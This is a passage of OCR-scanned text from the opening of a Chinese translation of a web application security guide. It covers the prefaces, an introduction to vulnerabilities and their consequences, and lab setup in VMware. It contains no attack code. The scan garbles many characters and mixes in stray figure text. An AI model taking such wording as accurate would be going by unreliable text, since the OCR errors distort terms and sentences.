EN 国 灵 程 所 设计 丛书 


[BI=MAs] [eo] [ete STI = 


Web Applications 










] 德 丸 浩 / 著 ow 器 襄 


Web 应 用 





权威 指南 


OWASP 北 京 区 负责 人 、51CTO 信 息 安全 专家 
在 虚拟 机 上 杀 目 体验 攻击 流程 





人 民 邮 电 出 版 社 


POSTS & TELECOM PRESS 


NN 
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图 灵 社 区 的 电子 书 没有 采用 专 有 客 
户 端 ， 您 可 以 在 任意 设备 上 ， i 
己 喜 欢 的 浏览 器 和 PDF 阅读 器 进 
阅读 。 


但 您 购买 的 电子 书 仅 供 您 个 人 使 用 ， 
未 经 授权 ， 不 得 进行 传播 。 

我 们 愿意 相信 读者 具有 这 样 的 民 知 
和 觉悟， 与 我 们 共同 保护 知识 产权 。 


如 果 购 买 者 有 侵权 行为 ， 我 们 可 能 
对 该 用 户 实施 包括 但 不 限于 关闭 该 
帐号 等 维权 措施 ， 并 可 能 追究 法 律 
责任 。 





德 丸 浩 

2008 年 创立 HASH 咨 询 公 司 ， 任 董事 长 。 
主要 从 事 网 络 安全 性 的 诊断 与 咨询 工 
作 ， 并 在 工作 之 余 通过 博客 普及 网 络 安 
全 知识 。 兼 任 KYOCERA Communication 
Systems 股 份 有 限 公司 技 术 顾 问 、 独 立行 
政法 人 信息 处 理 推进 机 构 ( IPA ) 兼职 研 


究 员 。Twitter ID 为 @ockeghem。 


赵 文 


程序 员 ，Ruby 语 言 爱 好 者 。 图 灵 电 子 书 
《关于 mruby 的 一 切 》 译 者 。 
个 人 博客 : http://zhaowen.me 





刘斌 
程序 员 ， 关 注 于 后 台 开 发 ，Java/Ruby 爱 
好 者 。 个 人 主页 : http://liubin.org 


OWASP 子 明 
OWASP 北 京 区 负责 人 ，51CTO 信 息 安全 
专家 ， 微 软 的 信息 安全 白皮书 的 译 者 。 
现 为 远 江 盛 邦 ( 北京 ) 公司 的 技术 总 监 。 
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及 对 策 进 行 了 详尽 的 讲解 。 
管理 进行 了 深入 的 探讨 。 
中 的 各 种 安全 隐患 。 


本 书 





我 投身 信息 安全 产业 领域 已 经 有 十 五 个 年 凑 了 。 过 去 我 通过 端口 扫描 ， 探 测 服务 器 的 操作 系 
统 类 型 ， 防火墙 出 现 后 ， 我 又 转 攻 Web 应 用 安全 ， 结 交 了 很 多 业内 的 顶级 信息 安全 专家 ， 与 他 
们 进行 了 大 量 的 交流 。 

互联 网 的 出 现 使 得 大 家 从 传统 的 纸 质 信件 传递 转变 为 通过 互联 网 电子 邮件 收发 邮件 ; 社交 网 
络 的 出 现 ， 让 我 们 得 以 通过 互联 网 来 结交 更 多 的 朋友 。 然 而 ， 我 们 在 享受 这 些 便利 的 同时 ， 也 承 
受 着 恶意 钓鱼 、 跨 站 脚本 攻击 、 恶 意 网 马 植 人 等 风险 。 这 些 行为 造成 用 户 的 信息 泄漏 ， 银 行 卡 、 
信用 卡 信息 被 恶意 盗 刷 ， 以 致 产生 大 量 的 经 济 损失 。 

通过 国际 权威 的 Web 应 用 安全 机 构 OWASP 所 发 布 的 TOP Ten， 可 以 看 出 Web 安全 的 重要 
性 。 现 在 全 球 有 效 的 网 络 攻击 中 ， 基 于 Web 的 占 80% ，SQL 注入 与 跨 站 脚本 攻击 一 直 都 位 于 
OWASP Top Ten 的 前 两 名 ， 这 两 种 攻击 通常 都 发 生 在 Web 应 用 当中 。 

本 次 受 图 灵 公 司 的 邀请 ， 参 与 了 本 书 的 校 译 工作 ， 在 进行 校 译 期 间 看 到 了 赵 文 和 刘斌 两 位 译 
者 深厚 的 日 文 专业 技术 功底 ， 同 时 也 次 深 地 感受 到 了 日 本 人 工作 的 严谨 ， 作 者 在 书 中 为 大 家 准备 
了 详实 的 应 用 案例 和 代码 。 

我 作为 OWASP 中 国 北京 的 负责 人 ， 有 幸 组织 和 参与 了 在 中 国 区 域内 召开 的 信息 安全 峰会 与 
亚洲 应 用 安全 峰会 ， 发 现 国外 的 信息 安全 专家 更 善于 总 结 。 他 们 能 通过 有 效 的 方法 论 有 效 地 进行 
一 些 精 尖 技术 的 推广 和 学 习 ， 而 国内 的 信息 安全 专家 在 介绍 一 些 高 精 技 术 时 一 般 只 告知 结果 ， 而 
不 介绍 过 程 。 

《Web 应 用 安全 权威 指南 》 这 本 书 的 作者 是 日 本 Web 安全 第 一 人 ， 足 见 其 编程 功底 之 深厚 。 
本 书 没有 欧美 作者 的 那些 谈 谐 幽默 的 用 语 ， 更 多 的 是 严 谍 而 实用 的 陈述 。 作 者 以 Web 应 用 的 安 
全 隐患 为 引子 ， 将 产生 安全 隐患 的 原因 作为 整个 主线 来 描述 ， 同 时 还 生动 地 介绍 了 试验 这 些 安 全 
隐患 的 环境 的 搭建 ， 以 及 缺陷 代码 的 示例 。 同 时 本 书 又 给 大 家 做 了 很 好 的 补充 说 明 ， 讲述 了 Web 
安全 的 基础 协议 和 原理 ， 帮 助 读者 打 好 Web 安全 的 基本 功 。 

最 难能可贵 的 是 ， 本 书 详尽 地 讲解 了 SQL 注入 、XSS、CSREF 等 的 基本 原理 ， 同 时 又 增加 了 
详尽 的 代码 解析 。 这 是 一 本 难得 的 Web 应 用 安全 指南 。 无 论 你 是 Web 安全 的 爱好 者 ， 还 是 研究 
者 ， 都 可 以 将 它 作 为 一 本 很 好 的 参考 书籍 。 个 人 建议 一 些 高 校 的 学 生 通 过 学 习 本 书 ， 实 现 从 Web 
安全 的 基础 入 门 到 精通 。 









































































































































OWASP 中 国 北京 区 负责 人 、51CTO 信息 安全 专家 
陈 亮 (OWASP 子 明 ) 


译 者 序 


2011 年 ， 索 尼 遭 受 了 3 次 大 规模 攻击 ， 造 成 7700 万 PlayStation Network (PSN ) 用 户 的 个 人 
信息 泄漏 。 攻 击 令 PSN 网 络 服务 瘫痪 了 23 天 ， 给 索尼 造成 了 上 亿美 元 的 经 济 损失 。 

2011 年 12 月 ， 国 内 知名 开发 者 社区 CSDN 遭 到 攻击 ，600 万 用 户 账 号 及 明文 密码 泄漏 并 在 
网 络 上 被 大 量 传播 。 

2013 年 3 月 ， 全 球 知名 的 云 笔记 应 用 Evernote 遭 到 攻击 ， 导 致 5000 万 用 户 的 邮箱 地 址 和 加 
密 密 码 泄漏 。 
写 下 这 篇 文字 时 ， 又 正 值 全 球 最 大 的 众 筹 网 站 Kickstarter 被 攻击 而 导致 用 户 信息 被 窃取 。 

一 件 件 触目 停 心 的 事件 无 一 不 在 提醒 着 我 们 网 络 安全 的 重要 性 。 造 成 这 些 事件 的 罪魁 祸首 或 
许 只 是 代码 中 一 些 不 起 眼 的 地 方 ， 但 引发 的 影响 及 后 果 却 骇人听闻 。 掌 握 如 何在 编程 时 不 引入 漏 
洞 已 成 为 了 Web 应 用 开发 者 不 可 或 缺 的 技能 。 

然而 ， 当 开发 者 想 要 系统 性 地 学 习 Web 应 用 安全 时 ， 却 发 现 市 面 上 充斥 着 以 攻击 者 的 视角 
写作 的 “XX 攻防 大 全 ”等 书籍 ， 却 鲜 有 站 在 开发 者 立场 的 优秀 的 权威 性 书籍 可 供 参 考 。 图 灵 公 
司 引进 的 这 本 《 Web 应 用 安全 权威 指南 》 正 好 填补 了 这 一 领域 的 空缺 。 

“在 那 本 “ 德 丸 本 ”中 有 透彻 的 讲解 。” 这 是 译 考 在 日 本 工作 期 间 ， 向 同事 询问 “什么 是 
CSRF” 时 得 到 的 答复 。 没 错 ,“ 德 九 本 ”就 是 本 书 在 日 本 的 昵称 ， 几 乎 在 每 个 Web 开发 小 组 的 
案头 都 能 发 现 它 的 身影 。 

本 书 的 作者 德 丸 浩 先生 在 日 本 被 誉 为 “Web 应 用 安全 领域 第 一 人 ”， 他 在 经 营 着 一 家 Web 安 
全 咨询 公司 的 同时 ， 还 在 博客 上 笔耕 不 辍 ， 和 孜孜 不 倦 地 分 享 着 自己 Web 安全 方面 的 知识 ， 得 此 
称号 可 谓 实 至 名 归 。 这 本 书 是 目前 为 止 德 丸 浩 先生 出 版 的 唯一 一 本 图 书 ， 可 以 说 是 从 业 多 年 的 经 
验 沉淀 下 来 的 精华 。 

看 过 日 系 技术 书 的 读者 ， 一 定 会 对 其 通俗 易 懂 、 深 入 浅 出 、 谦 虚 谨慎 等 特点 印象 深刻 ， 本 书 
也 不 例外 。SQL 注入 、XSS、CSREF 等 对 于 Web 开发 人 员 来 说 耳熟能详 却 可 能 一 知 半 解 的 术语 ， 
都 将 在 这 本 书 中 详细 训 析 。 本 书 既 适合 从 头 到 尾 通读 来 进行 系统 性 学 习 ， 也 适合 作为 参考 书 时 常 
查阅 。 

最 后 ， 再 一 次 感谢 图 灵 文 化 的 编辑 们 能 将 这 本 书 引 入 到 国内 。 感 谢 男 一 位 译 者 刘斌 的 辛勤 
付出 ， 使 得 本 书 能 够 成 功 地 问世 。 还 要 感谢 妻子 马超 对 我 使 用 业余 时 间 进 行 翻译 工作 的 鼓励 和 
支持 。 

希望 本 书 能 够 让 您 受益 。 





































































































赵 文 
2014 年 2 月 于 无 锡 


前 


zl 


近年 来 ， 利 用 Web 应 用 存在 的 安全 隐患 ( 即 所 谓 的 “漏洞 ”) 展开 攻击 的 案例 层出不穷 ， 受 
害 者 也 与 日 俱 增 。 虽 说 只 要 消除 安全 隐患 就 能 够 杜绝 这 些 攻击 ,但 这 就 需要 Web 应 用 开发 人 员 





掌握 正确 的 安全 性 方面 的 知识 。 





目前 ， 网 络 上 充斥 着 大 量 关 于 安全 性 的 信息 ， 但 多 数 内 容 都 只 是 流 于 表面 ， 无 法 解答 开发 人 


员 的 困惑 。 具 体 来 说 ， 主 要 存在 以 下 几 点 疑问 。 


。 为 什么 会 产生 安全 隐患 

e 安全 隐患 会 产生 什么 样 的 影响 

e。 如 何 编程 才能 消除 安全 隐患 

e 为 什么 某 些 方法 能 够 消除 安全 隐 吓 





而 本 书 就 是 为 了 解答 这 些 疑 问 而 创作 的 。 为 此 ， 从 安全 隐患 产生 的 原理 到 具体 的 对 策 ， 以 及 
采用 该 对 策 的 根据 ， 本 书 都 将 尽 可 能 地 详细 讲述 。 本 书 的 目标 读者 包括 程序 员 、 设 计 师 、 项 目 经 
理 、 质 量 管理 负责 人 等 参与 Web 应 用 开发 的 全 部 人 员 。 男 外 ， 本 书 也 会 站 在 Web 应 用 的 发 包 方 








( 甲 方 ) 的 立场 上 ， 尽 可 能 地 为 其 提供 有 用 的 信息 。 











虽然 本 书面 向 的 是 开发 人 员 ， 但 对 攻击 的 手段 也 做 了 详细 的 解说 。 目 的 就 是 为 了 能 够 让 读者 
切实 感受 到 安全 隐患 所 造成 的 影响 。 但 有 一 点 需要 注意 的 是 ， 如 果 没 有 得 到 网 站 管理 员 的 许可 就 
尝试 实施 攻击 的 话 ， 就 有 可 能 会 触犯 相关 的 法 律 法 规 。 由 于 非 专 业 人 员 很 难 判断 自己 的 行为 是 否 














违法 ， 因 此 ， 请 不 要 在 没有 得 到 许可 的 情况 下 攻击 正式 的 网 站 。 


为 了 让 读者 能 够 放心 地 体验 攻击 流程 ， 本 书 提供 了 在 VMware Player 的 虚拟 机 环境 中 尝试 安 





全 隐患 攻击 的 方法 。 希望 读者 能 够 通过 亲自 动手 ， 来 加 深 对 安全 隐患 的 理解 。 

















最 后 ,虽然 本 书 中 的 示例 代码 主要 使 用 了 PHP 语言， 但 讲述 的 内 容 对 其 他 语言 也 是 同样 适 





用 的 。 
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笔者 在 写作 本 书 时 ， 在 网 上 征集 了 一 些 试 读者 ， 并 根据 试 读者 的 意见 和 反馈 不 断 地 进行 了 调 
整 。 试 读者 不 仅 指出 了 错别字 及 语法 问题 ， 还 提出 了 各 种 各 样 的 改进 方案 ， 甚 至 还 就 安全 隐患 进 
行 了 深入 的 探讨 ， 实 在 令 笔者 受益 匪 浅 。 如 果 没 有 这 些 建议 和 探讨 ， 本 书 就 不 会 是 现在 的 样子 。 
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什么 是 Web 应 用 的 
安全 隐患 


本 章 将 对 “安全 隐患 ”这 一 贯穿 全 书 的 主题 加 以 概述 ， 包 
括 什么 是 安全 隐患 ， 安 全 隐患 会 带 来 哪些 问题 ， 安 全 隐患 
是 如 何 产 生 的 ， 等 等 。 本 章 最 后 会 给 出 全 书 的 结构 和 学 习 
方法 。 
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1.1 安全 隐患 即 “ 能 用 于 作恶 的 Bug” 


程序 Bug 对 于 开发 者 来 说 如 同 家 常 便 饭 。 应 用 程序 有 了 Bug， 就 会 出 现 各 种 不 正常 的 现象 。 
例如 ， 显 示 出 错误 的 结果 、 需 要 进行 的 处 理 迟 迟 不 能 结束 、 网 页 布局 错乱 、 啊 应 速度 极为 缓慢 
等 。 而 这 其 中 ， 有 一 种 Bug 能 被 恶意 利用 。 此 类 Bug 被 称 为 安全 隐患 (Vulnerability )， 有 时 也 被 
称 为 安全 性 Bug。 

以 下 是 一 些 恶意 利用 的 常见 案例 。 


未 经 许可 浏览 用 户 个 人 信息 等 隐私 信息 

算 改 网 站 的 内 容 

使 网 页 浏览 者 的 计算 机 感染 病毒 

伪装 成 他 人 来 笑 探 用 户 的 隐私 信息 、 发 布 文 昔 、 在 线 购物 、 肆 意 转 账 等 
使 目标 网 站 不 能 被 访问 

在 网 络 游戏 中 让 自己 达到 无 敌 状态 ， 或 非法 获得 游戏 中 的 装备 道具 

在 确认 自己 的 个 人 信息 时 ， 能 看 到 别人 的 个 人 信息 ? 


如 同 程序 员 对 一 般 的 Bug (无 奈 地 ) 习以为常 一 样 ，Web 应 用 程序 开发 者 对 安全 隐患 也 同样 
已 经 司空 见 惯 。 倘 若 开发 Web 应 用 程序 时 对 安全 隐患 一 无 所 知 ， 就 会 开发 出 能 被 用 来 进行 上 述 
恶 举 的 网 站 。 针 对 这 一 问题 ， 本 书 将 从 原理 到 具体 对 策 ， 来 详细 讲述 如 何在 开发 Web 应 用 时 村 
绝 安全 隐患 。 



































(D 能 看 到 其 他 用 户 个 人 信息 的 Bug 虽 不 是 故意 作恶 ， 但 由 此 而 偶然 造成 的 不 良 后 果 也 被 视 为 安全 隐患。 
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1.2 为 什么 存在 安全 隐患 会 有 问题 


为 什么 存在 安全 隐患 会 有 问题 ， 这 是 个 越 思考 就 越 深 入 的 课题 。 接 下 来 ， 就 让 我 们 从 几 个 方 
面 来 探讨 一 下 必须 杜绝 安全 隐患 的 原因 。 


令 经 济 损失 
应 杜绝 安全 隐患 的 原因 之 一 为 ,假如 网 站 的 安全 隐患 被 恶意 利用 ， 网 站 的 经 营 者 将 会 蒙受 经 
济 损失 。 典 型 的 损失 为 以 下 几 项 。 


赔偿 用 户 的 经 济 损失 
给 用 户 寄 送 代金 券 作为 补偿 时 的 花 销 
网 站 暂停 运营 造成 的 机 会 损失 
信誉 度 下 降 造成 的 营业 额 减少 
此 类 经 济 损失 的 总 额 有 时 会 高 达 数 十 亿 日 元 。 
然而 ， 或 诈 有 人 会 有 这 样 的 疑问 。 如 果 网 站 的 营销 规模 并 不 大 ， 上 述 列举 的 各 项 经 济 损失 就 
会 变 得 相对 较 小 。 所 以 可 能 有 些 网 站 运营 方 就 会 采取 这 种 思路 : 事前 不 做 相应 对 策 ， 万 一 出 事 了 
就 赔偿 用 户 的 损失 。® 
但 是 ， 实 际 的 损失 并 不 仅 限于 经 济 损失 。 
4 法 律 要 求 “ 
《个 人 信息 保护 法 》 是 规定 网 站 实施 安全 性 措施 的 法 律 。 该 法 第 20 条 规定 ， 拥 有 超过 5000 
名 用 户 的 网 站 运营 方 ， 作 为 个 人 信息 经 营 者 ， 有 义务 实施 网 站 的 安全 管理 措施 。 

































































( 安全 管理 措施 ) 
第 二 十 条 ”个 人 信息 经 营 者 , 为 了 安全 管理 其 用 户 的 个 人 信息 , 必须 采取 必要 且 恰 当 的 措施 ， 
防止 用 户 的 个 人 信息 被 泄漏 、 删 除 或 损坏 。 



















































































安全 管理 措施 的 具体 内 容 ， 由 各 省 厅 分 别 制定 规章 。 其 中 ,“ 经 济 产 业 领 域 关 于 个 人 信息 保 
护法 的 指导 方针 ”中 ,“ 技 术 性 安全 管理 措施 ”中 的 “个 人 数据 访问 控制 ”的 实践 方法 示例 ”一 
节 中 有 如 下 记载 。 











@， 这 种 策略 被 称 为 “风险 自 留 ”。 
@ 本 节 曾 述 的 是 日 本 的 相关 法 律 ， 供 中 国 读者 参考 。 让 憾 的 是 ， 截 至 译 稿 时 (2013 年 9 月)， 中国 在 网 络 安 全 隐患 方面 
还 没有 推出 相应 的 法 律 法 规 。 译 者 注 
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检验 处 理 个 人 信息 的 系统 中 引入 的 访问 控制 功能 的 有 效 性 。 
( 例如 ， 检 验 网 络 应 用 是 否 存在 安全 隐患 。) 























也 就 是 说 ,通过 Web 系统 管理 个 人 信息 的 运营 者 受到 《个 人 信息 保护 法 》 以 及 相关 规章 的 
约束 ， 承 担 着 对 Web 应 用 的 安全 隐患 采取 安全 管理 措施 的 法 律 义务 。 








多 对 用 户 造成 不 可 逆 的 伤害 

应 该 意识 到 ， 安 全 隐患 造成 的 事故 会 给 用 户 带 来 很 多 不 可 道 的 伤害 。 个 人 信息 一 旦 汽 漏 ， 就 
不 可 能 再 回收 。 账 号 被 盗 而 导致 用 户 的 名 誉 受 损 之 后 ， 就 再 也 回 不 到 以 前 的 状态 了 。 男 外 ， 如 果 
用 户 的 信用 卡 账号 被 泄漏 ， 即 使 赔偿 了 用 户 的 金钱 损失 ， 也 不 可 能 完全 平 抚 用 户 受到 的 起 慌 、 不 
安 等 精神 上 的 痛苦 。 换 言 之 ,一旦 发 生 了 安全 事故 ， 就 会 出 现 很 多 金钱 无 法 解决 的 问题 。 


















































人 欺骗 用 户 

大 多 数 网 站 都 会 夸耀 自身 有 多 么 安全 。 没 有 网 站 会 表示 “本 站 完全 不 保证 安全 性 ， 对 于 可 能 
出 现 的 安全 问题 概 不 负责 ”。 假 如 网 站 强调 了 自己 的 安全 性 ， 就 最 好 将 安全 隐患 消除 干净 。 安 全 
隐患 的 存在 会 极 大 地 影响 网 站 的 信誉 度 与 可 信任 性 。 


令 被 用 于 构建 僵尸 网 络 

僵尸 网 络 (Botnet ) 的 存在 ， 是 威胁 互联 网 安全 的 主要 因素 之 一 。 僵 尸 病毒 ( Bot ) 是 一 种 恶 
意 代 码 ( Malware )， 计 算 机 被 感染 后 就 能 够 被 外 界 远程 操纵 ， 用 来 发 送 垃圾 邮件 或 执行 DDoS 攻 
击 (分 布 式 拒绝 服务 攻击 ) 等 恶意 行为 。 据 传 ，2010 年 初 爆发 的 Gumblar 恶意 程序 的 目的 之 一 就 
是 构建 僵尸 网 络 。 

Web 应 用 的 安全 隐患 也 可 能 被 用 于 构建 僵尸 网 络 ， 情 形 如 岁 1-1 所 示 。 
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1-1 Web 应 用 的 安全 隐患 被 用 来 构建 僵尸 网 络 
Web 服务 器 


































































针对 Web 应 
安 雪 隐患 的 攻击 

















向 僵尸 计算 机 下 命令 
DDoS 攻击 

















攻击 = 和 my> 
构建 僵尸 网 络 

攻击 者 首先 会 算 改 存在 安全 隐患 的 网 站 的 内 容 ， 并 设 下 圈套 试图 让 浏览 者 的 计算 机 感染 僵尸 
病毒 。 假 如 浏览 网 站 的 用 户 的 计算 机 存在 安全 隐患 ， 就 会 感染 上 僵尸 病毒 ， 从 而 便 能 够 接受 攻击 
者 的 命令 。 进 入 僵尸 网 络 的 计算 机 ”会 被 用 来 发 送 垃圾 邮件 或 执行 DDoS 攻击 。 另 外， 有 时 僵尸 
机 融 也 会 去 攻击 新 的 服务 咒 。 如 此 这 般 ， 新 被 人 侵 的 机 融 也 加 入 到 了 被 控 的 僵尸 Web 服务 需 集 
群 ， 那 么 被 感染 僵尸 病毒 的 计算 机 集群 的 数量 就 会 不 断 扩 大 。 

据 传 ， 僵 尸 网 络 夷 来 的 收益 是 网 络 犯罪 者 的 一 项 主要 收 和 来源。 换言之， 在 互联 网 上 发 布 一 
个 带 有 安全 隐患 的 网 站 ， 就 有 被 反 社 会 势力 利用 的 可 能 性 。 









































中 ”俗称 “肉鸡 "。 一 一 译 者 注 
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1.3 











产生 安全 隐患 的 原因 


接 下 来 本 节 将 说 明 安 全 隐患 产生 的 原因 ， 据 此 就 可 以 理解 为 何 笔者 之 前 会 说 “Web 应 用 程 
序 开发 者 对 安全 隐患 已 经 司空 见 惯 ”。 
首先 ， 产生 安全 隐患 的 原因 可 分 为 以 下 两 类 。 


(A ) 由 Bug 造成 

(B ) 由 检验 功能 不 完善 造成 

情况 (A ) 包含 SQL 注入 (SQL Injection ) 和 跨 站 脚本 ( Cross Site Scripting， 简 称 XSS ) 等 极 
有 具 影响 力 的 著名 的 安全 隐患 。 此 类 隐患 不 仅 发 生 场 所 与 安全 性 毫 不 相关 ， 而 且 波及 范围 能 扩散 至 























整个 应 用 程序 ， 着 实 让 人 头疼 。 因 此 ， 开 发 团队 的 每 一 个 成 员 在 编写 应 用 程序 时 就 必须 具有 极 强 
的 安全 意识 ， 但 可 惜 目前 还 有 很 多 开发 团队 并 未 这 么 做 。 














另 一 方面 ， 目 录 遍 历 ( Directory Traversal ) 漏洞 是 情况 ( B ) 中 一 个 代表 性 的 例子 。 产 生 此 类 





安全 隐患 的 原因 是 很 多 开发 者 缺乏 执行 安全 检验 的 意识 ， 而 且 同 (A ) 一 样 ， 它 造成 的 影响 也 会 
波及 整个 应 用 程序 。 
由 此 可 见 ，Web 应 用 的 安全 隐患 可 以 被 形象 地 比喻 为 “在 意 想 不 到 的 地 方 隐 藏 着 的 一 个 很 深 





的 陷阱 ” 









































。 因 此 ,一直 以 来 安全 隐患 都 在 源源 不 断 地 产生 。 但 是 ， 与 真正 的 陷阱 不 同 的 是 ,我们 





能 够 通过 学 习 提 前 得 知 哪里 会 有 陷阱 。 
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1.4 安全 性 Bug 与 安全 性 功能 

















本 章 开 头 我 们 提 到 安全 隐患 是 一 种 Bug， 但 有 时 即使 修正 了 所 有 Bug 也 不 能 保证 应 用 程序 
绝对 安全 。 举 例 来 说 ， 没 有 使 用 HTTPS 协议 ( 超 文 本 传输 安全 协议 ) 来 加 密 传输 的 状态 并 不 能 
算 作 是 Bug， 这 种 情况 下 ,虽然 不 存在 (狭义 的 ) 安全 隐患 ， 但 是 传输 的 内 容 却 存 在 被 窃听 的 可 
能 性 。 

如 同 使 用 HTTPS 来 对 传输 内 容 进 行 加 密 那 样 ， 积 极 主动 地 加 强 安全 性 的 措施 在 本 书 中 被 称 
为 “安全 性 功能 "。 安 全 性 功能 实 为 应 用 程序 的 一 种 需求 ， 所 以 也 被 称 为 安全 性 需求 。 

从 开发 管理 这 一 层面 上 来 说 ， 将 应 用 程序 安全 性 方面 的 Bug 和 需求 这 两 者 整理 清楚 也 是 至 
关 重 要 的 。 如 同 Bug 必须 被 消除 一 样 ， 消 除 安全 隐患 也 应 当 是 理所当然 的 。 另 一 方面 ， 是 否 将 
安全 性 功能 加 入 到 项 目 需求 中 ， 则 应 该 由 软件 的 发 包 方 结合 项 目 经 费 作 出 决定 。 

为 了 让 读者 有 意识 地 区 分 安全 性 Bug 和 安全 性 功能 ， 本 书 特 意 将 两 者 分 别 独 立成 章 来 加 以 
细 述 。 
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1.5 本 书 的 结构 


本 书 结构 如 下 。 

第 1 章 ， 引 入 安全 隐患 这 个 概念 ， 介 绍 安全 隐患 是 如 何 产 生 的 ， 说 明 安全 性 Bug 和 安全 性 
功能 的 区 别 。 

第 2 章 ， 搭 建 本 书 的 试验 环境 。 本 书 通过 VMware 的 虚拟 机 提供 了 可 以 实际 体验 安全 隐患 的 
环境 。 该 章 会 介绍 搭建 此 虚拟 机 环境 和 安装 诊断 用 工具 的 方法 。 

第 3 章 , 讲述 HTTP、Cookie、 会 话 ( Session ) 管理 等 Web 应 用 安全 方面 的 基础 知识 ， 还 会 
介绍 同 源 策略 。 

第 4 章 ， 全 书 的 核心 章节 。 针 对 Web 应 用 的 每 一 个 功能 中 易 产 生 的 安全 隐患 模式 ， 对 其 原 
时 及 对 策 等 各 个 方面 加 以 详细 说 明 。 

第 5 章 ， 讲述 认证 、 账 号 管理 、 授 权 、 日 志 输 出 等 典型 的 安全 性 功能 。 

第 6 章 ， 讲述 字符 编码 与 安全 性 的 关系 。Web 应 用 安全 隐患 的 起 因 很 多 都 涉及 字符 编码 。 本 
章 将 讲述 字符 编码 的 基础 知识 、 安 全 隐患 产生 的 原因 和 相应 的 对 策 。 

第 7 章 ， 从 Web 应 用 以 外 的 方面 ， 描 绘 提 高 网 站 安全 性 措施 的 全 景 。 

第 8 章 ， 讲 述 如 何 开发 安全 无 广 的 Web 应 用 。 














人 





























本 章 将 讲解 如 何 搭建 本 书 中 安全 隐患 用 例 的 运行 环境 ， 其 
中 的 截图 是 在 Windows 7 中 取得 的 ， 但 这 些 操作 同 样 适用 
于 Windows XP 或 Windows Vista。 
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2.1 试验 环境 概要 


本 书 中 安全 隐患 用 例 的 运行 环境 如 下 : 


Linux (Ubuntu 10.04 ) 

Apache 2.2 

PHP 5.3 

PostgreSQL 8.4 

Postfix 等 兼容 Sendmail 的 电子 邮件 服务 需 


为 了 方便 使 用 Windows 操作 系统 的 读者 ， 本 书 为 大 家 准备 了 已 经 将 上 述 环境 搭建 完毕 的 
VMware 虚拟 机 。 下 图 展示 了 在 VMware 中 运行 Linux 系统 的 情形 。 

















2-1 本 书 的 试验 环境 


















实际 环境 1 
虚 所 Linux 
虚拟 机 Apache + PHP 
浏览 PostgreSOL 
浏览 器 Postfix … 
假想 环境 互联 网 Web 服务 器 
浏览 器 Linux 
Ar A Apache + PHP 
由 PostgreSOL 
Postfix ... 


虽然 虚拟 机 中 的 Linux 服务 器 事实 上 是 在 读者 自己 的 计算 机 中 运行 的 ， 但 请 将 其 想像 成 互联 
网 上 的 一 台 远 程 服务 需 。 通 过 使 用 虚拟 机 ， 我 们 就 能 在 自己 的 计算 机 上 模拟 近似 于 互联 网 上 的 服 
务 骨 环境 。 
本 章 需 要 安装 以 下 软件 。 
VMware Player (VMware 运行 环境 ) 
Fiddler (诊断 用 工具 ) 
虚拟 机 
VMware Player 和 Fiddler 是 免费 公开 的 软件 。 虚 拟 机 则 是 指 为 了 能 够 在 VMware Player 上 运 
行 本 书 代 码 而 配置 的 Linux 环境 。 
从 下 一 节 开 始 ， 我 们 将 依次 解说 各 软件 的 安装 方法 。 
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2.2 安装 VMware Player 


令 什么 是 VMware Player 

VMware Player 是 美国 VMware 公司 推出 的 一 款 免 费 虚 拟 机 软件 。 前 面 已 经 提 到 ， 本 书 将 利 
用 VMware Player 在 虚拟 机 上 搭建 Linux 服务 器 的 运行 环境 ， 并 将 其 视 为 Web 服务 器 来 进行 各 
种 试验 。 

写作 本 书 时 (2011 年 4 月 )，VMware Player 的 最 新 版 本 为 3.1.4， 软 件 要 求 的 配置 如 下 。 


CPU : 标准 的 x86 兼容 系统 或 x86-64 位 兼容 个 人 计算 机 ， 支 持 Intel VT 或 者 AMD-V (不 
支持 PAE 的 Pentium M 等 处 理 器 无 法 安装 ) 

操作 系统 : Windows XP 、Windows Vista 或 Windows 7 

内 存 : 1G 以 上 

硬盘: 有 1G 以 上 空余 容量 (包括 虚拟 机 ) 


如 果 硬 盘 剩余 空间 不 足 ， 可 将 虚拟 机 保存 于 外 部 存储 媒介 (如 UU 盘 或 SD 卡 等 )， 这 样 安装 
VMware Player 本 身 只 需要 150M 左右 的 空间 即 可 。 





























令 下 载 VMware Player 
安装 VMware Player 的 最 新 版 ， 可 以 前 往 http://www.vmware.com/go/downloadplayer-cn/ 下 
载 ， 页 面 如 图 2-2 所 示 。 





人 本 章 的 讲解 主要 针对 Windows 操作 系统 ， 但 本 书 附带 的 虚拟 机 环境 在 Linux 版 的 VMware Player 3.1.2， 以 及 Mac OS 
XX 的 VMware Player 3.1.2 上 已 经 做 过 测试 ， 均 能 正常 运行 。 
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他 





图 2-2 在 VMware 的 官方 网 站 上 能 下 载 最 新 版 的 安装 文件 











St )| https://my.vmware.com/cn/web/vmware/free#desk Dv GX 





| 


| 下 载 VMware Player 6.0#.. x 









社区 采购 次 本 




















产品 下 载 。 ”驱动 程序 和 工具 | 开源 代码 需要 获取 下 载 E 
Ee 关于 本 产品 
VMware Player for Windows i 
I 
(exe | 94 MB) VMware Player 6.0.3 
田 显示 详细 信息 文档 
发 行 说 明 (英语 ) 
, | 全 
VMware Player for Linux 32-bit 下 载 加 VMware Player and VMware Player Plus 局 
125% ~ 

















多 安装 VMware Player 
双击 安装 程序 。 这 时 会 显示 以 下 安装 向 导 。 


2-3 ”安装 开始 


四 
VMware Player 安装 








欢迎 使 用 VMware player 安装 向 导 


安装 向 导 将 在 您 的 计算 机 上 云 蒜 VMware Player。 要 竺 绞 ， 请 单 
击 “ 下 一 步 " 














下 一 步 由 > 到 江 


本 | 


安装 过 程 中 可 以 全 部 使 用 默认 选项 。 如 有 必要 ， 可 以 更 改 安装 路 径 等 。 
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图 2-4 更 改 安装 路 径 
| VMware Player 安装 


目标 文件 夫 az 
单 击 “ 下 一 步 ”去 柳 到 此 文件 顽 ， 或 单 击 “更 改 ” 安 装 到 其 他 文件 夹 - 让 





将 VMware Player 安装 到 : 
D:\Program Files 




















上 3 


当 看 到 以 下 面 面 时 ,说 明 安 装 已 经 成 功 。 然 后 按照 画面 上 的 指示 ， 重 启 系 统 即 可 。 














图 2-5 安装 完成 


下 
VMware Player 安装 








安装 向 导 完 


去 获 向 导 已 成 功 完 成 与 VMware Player 相关 的 操作 。 单 击 “ 充 
成 ” 运 出 向 导 - 
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2.3 ”安装 虚拟 机 及 运行 确认 











接 下 来 安装 安全 隐患 用 例 的 虚拟 机 。 虚 拟 机 的 安装 ， 请 先 到 本 书 的 支持 页 面 下 载 WASBOOK.ZIP 
文件 : http://www.ituring.com.cn/book/download/d2970acc-5c0f-45ae-857d-be55a5421be4; 然后 ， 解 





